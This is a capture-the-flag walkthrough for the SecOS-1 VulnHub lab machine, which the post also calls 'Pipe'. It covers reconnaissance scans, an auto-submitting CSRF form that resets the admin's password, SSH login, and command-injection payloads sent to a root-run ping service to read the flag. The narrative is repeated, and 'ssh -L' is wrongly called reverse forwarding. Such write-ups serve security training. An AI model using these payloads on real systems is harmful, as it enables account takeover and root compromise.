Mission : Get the root flag on `Pipe` which is a deliberately vulnerable virtual machine hosted at https://www.vulnhub.com/. The virtual machine can be downloaded at https://www.vulnhub.com/entry/secos-1,88/. I quickly loaded up the virtual machine into my VMWare Player and i was good to go !
Detailed Steps for getting root:
I ran a quick nmap scan to identify the Ip address of the Pipe VM. I use `host-only` networking for both my Pipe Vm and Kali box.
We identify the IP address of the new VM as 192.168.28.138.
A nmap scan of the box shows that the box is running a http service on port 8081 and a ssh service on 22.
We run nikto againts the webserver but dont find anything of much interest. We then dirbust the webserver which reveals a bunch of interesting directories that we should look into.
It seems that the vulnerable application allows us to create a user account and have a look at the various pages on the website. We see that among other things there seems to be 3 users on the box one of whom is the administrator. Also there is a way to send messages to the admin.
We also see an About page that tells us that the site has been developed using Node.js and MangoDB. At this point we try the an authentication bypass seen in Node.js and MangoDB systems. A good discussion of it is here : Hacking Node.js and MangoDB http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html: . It seems that the box is not vulnerable to this bypass. We begin to observer the webapp more closely and find that the login page source code has comment which is a hint.
We have a look at the /hint page and its source code which reveals that we should launch a CSRF kinda attack on the administrator.
The hint page tells us that the administrator will visit any site running on 127.0.0.1 if he is asked to do so. The hint is clear that we should feed a URL to the administrator to see. This can be done via the messaging feature of the webapp which allows us the send messages to the administrator. Relooking at the webapp we see that there is a feature to change the password. We decicde to trick the admin into changing his password to our specified one. For this we create a HTML page with hidden inputs and POST the data to the /change-password .
We know ask the admin to view this page by sending him a message .
We hope that when the admin visits this page his password will get reset and we can login. Well after a few minutes we try logging in as admin and we see that our little trick has worked !
We login to the admins message board and see that he has a message from a user 'pirate` who claims to have cracked his password.
We try ssh'ing into the box with these credentials and we are immediately logged in !
Once we login we see that there a bunch of interesting files in the users home directory.
If we do a quick directory listing 2 things stand out. i) There is an internalServer running as root on the box ii) there is a additional ping.ejs file which is not normally visible via the public facing web interface.
We look at the contents of both the internerlServer and ping.ejs files.
It seems that besides the public facing webapp there is an additonal server running on the box on port 9000. This server provides a Ping capability for the admin to maybe ping other systems. When we look at the code for the ping service we see that the exec api is called with the user provided IP address without any input checks. We can inject code here as the application does not sanitize the input data.
We can launch the command injection both via the web browser or the command line. Let see both approaches .
a) Command line : We can use wget or curl to post data to the internal server and inject our code in the post request.
Here we send a post request with a ip address =1 and inject our 'id' command along with the request .
Similarly we can use curl to post data as well
b) Web browser : In order to be able to see the internal webapp on our attacking machine we use a ssh reverse port forwarding technique using the ssh -L parameter. Via this method we make the port 9000 of our victim machine available on our kali machine at port 4545.
Now we can access the port 9000 of the inernal web application
Detailed Steps for getting root:
I ran a quick nmap scan to identify the Ip address of the Pipe VM. I use `host-only` networking for both my Pipe Vm and Kali box.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # arp-scan --localnet | |
| Interface: eth0, datalink type: EN10MB (Ethernet) | |
| Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/) | |
| 192.168.28.1 00:50:56:c0:00:01 VMware, Inc. | |
| 192.168.28.138 00:0c:29:9a:5b:b1 VMware, Inc. | |
| 192.168.28.254 00:50:56:eb:e9:c7 VMware, Inc. | |
| 3 packets received by filter, 0 packets dropped by kernel | |
| Ending arp-scan 1.9: 256 hosts scanned in 2.086 seconds (122.72 hosts/sec). 3 responded |
We identify the IP address of the new VM as 192.168.28.138.
A nmap scan of the box shows that the box is running a http service on port 8081 and a ssh service on 22.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Host is up (0.00065s latency). | |
| Not shown: 998 closed ports | |
| PORT STATE SERVICE VERSION | |
| 22/tcp open ssh (protocol 2.0) | |
| | ssh-hostkey: | |
| | 1024 9b:d9:32:f5:1d:19:88:d3:e7:af:f0:4e:21:76:7a:c8 (DSA) | |
| | 2048 90:b0:3d:99:ed:5b:1b:e1:d4:e6:b5:dd:e9:70:89:f5 (RSA) | |
| |_ 256 78:2a:d9:e3:63:83:24:dc:2a:d4:f6:4a:ac:2c:70:5a (ECDSA) | |
| 8081/tcp open http Node.js (Express middleware) | |
| |_http-methods: GET | |
| |_http-title: Secure Web App | |
| 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi : | |
| SF-Port22-TCP:V=6.47%I=7%D=1/8%Time=56908E80%P=i686-pc-linux-gnu%r(NULL,27 | |
| SF:,"SSH-2\.0-OpenSSH_6\.6p1\x20Ubuntu-2ubuntu1\r\n"); | |
| MAC Address: 00:0C:29:9A:5B:B1 (VMware) | |
| Device type: general purpose | |
| Running: Linux 3.X | |
| OS CPE: cpe:/o:linux:linux_kernel:3 | |
| OS details: Linux 3.11 - 3.14 | |
| Uptime guess: 198.048 days (since Wed Jun 24 23:28:37 2015) | |
| Network Distance: 1 hop | |
| TCP Sequence Prediction: Difficulty=251 (Good luck!) | |
| IP ID Sequence Generation: All zeros |
We run nikto againts the webserver but dont find anything of much interest. We then dirbust the webserver which reveals a bunch of interesting directories that we should look into.
It seems that the vulnerable application allows us to create a user account and have a look at the various pages on the website. We see that among other things there seems to be 3 users on the box one of whom is the administrator. Also there is a way to send messages to the admin.
We also see an About page that tells us that the site has been developed using Node.js and MangoDB. At this point we try the an authentication bypass seen in Node.js and MangoDB systems. A good discussion of it is here : Hacking Node.js and MangoDB http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html: . It seems that the box is not vulnerable to this bypass. We begin to observer the webapp more closely and find that the login page source code has comment which is a hint.
We have a look at the /hint page and its source code which reveals that we should launch a CSRF kinda attack on the administrator.
The hint page tells us that the administrator will visit any site running on 127.0.0.1 if he is asked to do so. The hint is clear that we should feed a URL to the administrator to see. This can be done via the messaging feature of the webapp which allows us the send messages to the administrator. Relooking at the webapp we see that there is a feature to change the password. We decicde to trick the admin into changing his password to our specified one. For this we create a HTML page with hidden inputs and POST the data to the /change-password .
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <body> | |
| <form name="changepass" method="post" action="http://127.0.0.1:8081/change-password"> | |
| <input type="hidden" name="username" value="spiderman"> | |
| <input type="hidden" name="password" value="abc123"> | |
| </form> | |
| <script type="text/javascript"> | |
| document.changepass.submit(); | |
| </script> | |
| </body> | |
| </html> |
We know ask the admin to view this page by sending him a message .
We login to the admins message board and see that he has a message from a user 'pirate` who claims to have cracked his password.
We try ssh'ing into the box with these credentials and we are immediately logged in !
Once we login we see that there a bunch of interesting files in the users home directory.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| spiderman@SecOS-1:~/vnwa$ ls -lrt | |
| total 44 | |
| -rw-rw-r-- 1 spiderman spiderman 559 May 4 2014 package.json | |
| -rw-rw-r-- 1 spiderman spiderman 1070 May 4 2014 LICENSE | |
| drwxrwxr-x 2 spiderman spiderman 4096 May 4 2014 views | |
| drwxrwxr-x 6 spiderman spiderman 4096 May 4 2014 node_modules | |
| drwxrwxr-x 4 spiderman spiderman 4096 May 4 2014 public | |
| -rwxrwxr-x 1 spiderman spiderman 7772 May 4 2014 server.js | |
| drwxrwxr-x 2 spiderman spiderman 4096 May 5 2014 lib | |
| drwxrwxr-x 2 spiderman spiderman 4096 May 7 2014 scripts | |
| -rwxrwxr-x 1 spiderman spiderman 1981 Jan 10 01:00 internalServer.js.2 | |
| -rw-rw-r-- 1 spiderman spiderman 0 Jan 10 01:22 headers | |
| -rwxrwxr-x 1 spiderman spiderman 1981 Jan 10 01:29 internalServer.js | |
| spiderman@SecOS-1:~/vnwa$ ls -l views/ | |
| total 64 | |
| -rw-rw-r-- 1 spiderman spiderman 591 May 4 2014 about.ejs | |
| -rw-rw-r-- 1 spiderman spiderman 13861 May 4 2014 bootstrap.ejs | |
| -rw-rw-r-- 1 spiderman spiderman 740 May 4 2014 change-password.ejs | |
| -rw-rw-r-- 1 spiderman spiderman 18 May 4 2014 footer.ejs | |
| -rw-rw-r-- 1 spiderman spiderman 2048 May 4 2014 header.ejs | |
| -rw-rw-r-- 1 spiderman spiderman 548 May 4 2014 hint.ejs | |
| -rw-rw-r-- 1 spiderman spiderman 498 May 4 2014 index.ejs | |
| -rw-rw-r-- 1 spiderman spiderman 754 May 4 2014 login.ejs | |
| -rw-rw-r-- 1 spiderman spiderman 690 May 4 2014 messages.ejs | |
| -rw-rw-r-- 1 spiderman spiderman 2114 May 4 2014 ping.ejs | |
| -rw-rw-r-- 1 spiderman spiderman 910 May 4 2014 send-message.ejs | |
| -rw-rw-r-- 1 spiderman spiderman 697 May 4 2014 sign-up.ejs | |
| -rw-rw-r-- 1 spiderman spiderman 646 May 4 2014 users.ejs | |
| spiderman@SecOS-1:~/vnwa$ |
If we do a quick directory listing 2 things stand out. i) There is an internalServer running as root on the box ii) there is a additional ping.ejs file which is not normally visible via the public facing web interface.
We look at the contents of both the internerlServer and ping.ejs files.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <body role="document"> | |
| <!-- Fixed navbar --> | |
| <div class="navbar navbar-inverse navbar-fixed-top" role="navigation"> | |
| <div class="container"> | |
| <div class="navbar-header"> | |
| <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"> | |
| <span class="sr-only">Toggle navigation</span> | |
| </button> | |
| <a class="navbar-brand" href="/">Internal admin tools</a> | |
| </div> | |
| <div class="navbar-collapse collapse"> | |
| <ul class="nav navbar-nav"> | |
| </ul> | |
| </div><!--/.nav-collapse --> | |
| </div> | |
| </div> | |
| <div class="container"> | |
| <form class="form-signin" action="/" method="POST"> | |
| <h4 class="form-signin-heading">Enter the IP you want to ping</h4> | |
| <input type="text" class="input-block-level" placeholder="127.0.0.1" name="ip"><br /> | |
| <button class="btn btn-large btn-primary" type="submit">Ping !</button> | |
| </form> | |
| <% if (typeof message != "undefined" && message != null && message != "") { %> | |
| <div class="panel panel-default"> | |
| <div class="panel-heading"> | |
| <h3 class="panel-title">Ping result</h3> | |
| </div> | |
| <div class="panel-body"><%= message %></div> | |
| </div> | |
| <% } %> | |
| </div> <!-- /container --> | |
It seems that besides the public facing webapp there is an additonal server running on the box on port 9000. This server provides a Ping capability for the admin to maybe ping other systems. When we look at the code for the ping service we see that the exec api is called with the user provided IP address without any input checks. We can inject code here as the application does not sanitize the input data.
We can launch the command injection both via the web browser or the command line. Let see both approaches .
a) Command line : We can use wget or curl to post data to the internal server and inject our code in the post request.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wget --post-data="ip=1;id" localhost:9000 | |
| --2016-01-10 01:44:34-- http://localhost:9000/ | |
| Resolving localhost (localhost)... ::1, 127.0.0.1 | |
| Connecting to localhost (localhost)|::1|:9000... failed: Connection refused. | |
| Connecting to localhost (localhost)|127.0.0.1|:9000... connected. | |
| HTTP request sent, awaiting response... 200 OK | |
| Length: 2048 (2.0K) [text/html] | |
| ....... | |
| <div class="panel panel-default"> | |
| <div class="panel-heading"> | |
| <h3 class="panel-title">Ping result</h3> | |
| </div> | |
| <div class="panel-body">uid=0(root) gid=0(root) groups=0(root) | |
| </div> | |
| </div> | |
| </div> <!-- /container --> | |
Here we send a post request with a ip address =1 and inject our 'id' command along with the request .
Similarly we can use curl to post data as well
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl --data "ip=;ls -l ; cat /root/flag.txt" localhost:9000 | |
| .... | |
| ..... | |
| /div> | |
| <div class="panel-body">total 77 | |
| drwxr-xr-x 2 root root 4096 Apr 25 2014 bin | |
| drwxr-xr-x 4 root root 1024 Apr 25 2014 boot | |
| drwxr-xr-x 15 root root 4100 Jan 10 00:40 dev | |
| drwxr-xr-x 90 root root 4096 Jan 10 00:40 etc | |
| drwxr-xr-x 4 root root 4096 Apr 25 2014 home | |
| lrwxrwxrwx 1 root root 33 Apr 25 2014 initrd.img -> boot/initrd.img-3.13.0-24-generic | |
| drwxr-xr-x 21 root root 4096 Apr 25 2014 lib | |
| drwx------ 2 root root 16384 Apr 25 2014 lost+found | |
| drwxr-xr-x 3 root root 4096 Apr 25 2014 media | |
| drwxr-xr-x 2 root root 4096 Apr 11 2014 mnt | |
| drwxr-xr-x 4 root root 4096 Apr 25 2014 opt | |
| dr-xr-xr-x 312 root root 0 Jan 10 00:40 proc | |
| drwx------ 2 root root 4096 May 5 2014 root | |
| drwxr-xr-x 18 root root 640 Jan 10 00:41 run | |
| drwxr-xr-x 2 root root 12288 Apr 25 2014 sbin | |
| drwxr-xr-x 2 root root 4096 Apr 16 2014 srv | |
| dr-xr-xr-x 13 root root 0 Jan 10 00:40 sys | |
| drwxrwxrwt 2 root root 4096 Jan 10 01:42 tmp | |
| drwxr-xr-x 10 root root 4096 Apr 25 2014 usr | |
| drwxr-xr-x 12 root root 4096 Apr 25 2014 var | |
| lrwxrwxrwx 1 root root 30 Apr 25 2014 vmlinuz -> boot/vmlinuz-3.13.0-24-generic | |
| Hey, | |
| Congrats, you did it ! | |
| The flag for this first (VM) is: MickeyMustNotDie. | |
| Keep this flag because it will be needed for the next VM. | |
| If you liked the Web application, the code is available on Github. | |
| (https://github.com/PaulSec/VNWA) | |
| There should be more VMs to come in the next few weeks/months. | |
| Twitter: @PaulWebSec | |
| GitHub : PaulSec | |
| </div> | |
| </div> | |
| </div> <!-- /container --> | |
| </body> | |
| </html> |
b) Web browser : In order to be able to see the internal webapp on our attacking machine we use a ssh reverse port forwarding technique using the ssh -L parameter. Via this method we make the port 9000 of our victim machine available on our kali machine at port 4545.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ssh -L 4545:127.0.0.1:9000 spiderman@192.168.28.138 | |
| spiderman@192.168.28.138's password: | |
| Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic i686) | |
| * Documentation: https://help.ubuntu.com/ | |
| ... | |
| ... |
Now we can access the port 9000 of the inernal web application
No comments:
Post a Comment